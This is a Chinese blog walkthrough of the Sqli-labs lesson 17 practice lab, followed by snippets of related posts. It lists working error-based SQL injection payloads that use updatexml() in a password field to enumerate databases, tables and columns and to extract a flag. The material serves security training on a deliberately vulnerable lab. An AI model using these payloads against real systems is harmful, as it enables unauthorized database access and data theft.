Sqli-labs——lesson17报错注入

已于 2022-07-10 10:27:52 修改
阅读量234 收藏
点赞数
分类专栏: Sqli-labs闯关 文章标签: 大数据
于 2022-07-06 14:21:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62281892/article/details/125636173
版权

xpath

我也不知道为啥清楚对username进行了过滤,但是对password没有进行过滤

0x7e是ASCII编码,解码为~,concat是将~和后面连接成字符串,但updatexml()会因为~这个符号不满足xpath语法,所以这个语句不能执行成功,就会报错。

1、查库

uname=admin&passwd=sd' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)#&Submit=Submit

2、想用group_concat函数来显示所有的库,但是试过以后发现不允许使用group函数

3、查表

uname=admin&passwd=sd' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'  limit 0,1)),1)#&Submit=Submit

 4、查列

uname=admin&passwd=sd' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='01PZEtQN'  limit 0,1)),1)#&Submit=Submit

 5、爆数据

uname=admin&passwd=sd' and updatexml(1,concat(0x7e,(select flag from security.01PZEtQN limit 3,1)),1)#&Submit=Submit  

!!!注意limit m,n 的用法,为从下标为m的开始取n个单位的

 但是flag没有显示完全,要把右边的一起爆出来


uname=admin&passwd=admin' and updatexml(1,concat(0x7e,right((select(group_concat(flag)) from security.thrzKuTU) ,31),0x7e),1) #&submit=Submit

Shock397
关注
专栏目录
SQLi-Labs 基于报错的SQL注入
shangMD01的博客
02-17 2525
实验环境 操作系统:Windows10 安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar等 靶机:A-SQLi-Labs 安装的应用软件:Apache、MYSQL、PHP;DVWA、SQLi-Labs 实验步骤: 1.访问目标网站 在Windows10上打开火狐浏览器,并访问靶机上的SQLi-labs网站Less-1 http://靶机ip/sql/Less-1 登录后,先给一个GET参数: http://靶机ip/sql/Less-1/?i
sqli-labs Less-5 (报错注入
A9874564的博客
02-25 4285
在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
sqli-labs-基于报错的注入
zlloveyouforever的博客
04-30 2842
这里使用sqli-labs第六关来学习报错注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
sqli-labs less-14post报错注入updatexml
最新发布
wanggonghanfei的博客
10-07 1353
利用hackbar进行注入,构造post语句页面报错,根据分析,闭合方式。
SQLi Labs Lesson17
1ame的博客
08-15 1164
Lesson - 17 Update Query - Error Based - String 首先进入欢迎界面: 本页面的作用是重置用户的密码。 本节对注入有过滤。 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = sub
9、sqli-labs(报错注入1-4)
weixin_41489908的博客
11-26 165
less 1 1、http://192.168.1.119/sqli/Less-1/?id=1 2、在id后面输入’,网页报错, 3、报错内容’1’’ LIMIT 0,1 4、猜测该sql语句为select * from ad where id=‘id’ limit 0,1 5、我们试着闭合 http://192.168.1.119/sqli/Less-1/?id=1’ --+ 程序正常 6、通过...
sqli-labs之报错注入练习笔记
haha516130的博客
06-11 365
http://localhost/sqli-labs-master/Less-11/ 输入: ' and updatexml(1,concat(0x7e,(select user()),0x7e),1) # ' and updatexml(1,concat(0x7e,(select database()),0x7e),1) # updatexml()函数的格式为:updatexml (xml_document, XPath_string, new_value); 参数:xml_document是Str
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sql-labs报错注入
weixin_47346400的博客
03-12 614
updatexml() 爆数据库 爆表 爆用户
Sqli-labs16-20 十种mysql报错注入语句
Recar的博客
12-26 1852
十六题 基于时间的布尔盲注 双引号admin")#登陆成功uname=") or length((select database()))=8 #&passwd=1 修改 payload直接之前的脚本跑第十七题 更新查询报错这个页面是密码重置页面重置密码是更新操作update users set password=xxx where username=xxx看下 源码看到源码里面对 用户名进行了过滤
sqli-labs:1-4,基于报错的注入
weixin_30594001的博客
03-23 113
sqli1: 脚本 1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sat Mar 23 09:37:14 2019 4 5 @author: kenshin 6 """ 7 8 import requests,re 9 url = 'http://localhost/sqli-labs/...
SQLilabs的第19关——http请求头注入(Referer)(报错注入
qq_73393033的博客
07-22 439
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
sqli-labs】Less 6——报错注入(双引号)
用博客做做记录的小白
07-03 310
sqli-labs第6关less 6,双引号注入型,解题方法为报错注入函数。
sqli-labs-报错注入-updatexml报错
weixin_51706044的博客
03-14 1427
文章目录前言一、updatexml报错二、updatexml报错记忆 前言 union注入是最简单方便的,但是要求页面必须有显示位,没有就没法利用. 所以当页面没有显示位时,我们需要用其他方法来获取数据.因此我们可以使用报错注入: 有些网站在开发调试阶段开启了报错提示信息,如果没有关闭,就有可能存在报错注入. 报错注入函数: floor函数 extractvalue报错 updatexml报错 今天我在这里先记录一下对于updatexml报错函数的学习 一、updatexml报错 基本格式: ?id=
SQLI-Labs:Less - 5(盲注 报错注入
weixin_43320796的博客
06-14 368
报错注入是一种SQL注入技术,它利用应用程序未正确处理数据库错误的情况,通过构造特定的SQL语句使得数据库产生错误,从而将错误信息暴露在网页上。攻击者可以通过分析这些错误信息,获取数据库中的敏感信息,如用户数据、数据库版本等。报错注入的核心在于利用数据库管理系统(DBMS)的特定函数,如MySQL的updatexml()和extractvalue()函数,当这些函数的参数包含特殊字符时,会触发数据库错误,并将参数内容显示在错误信息中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值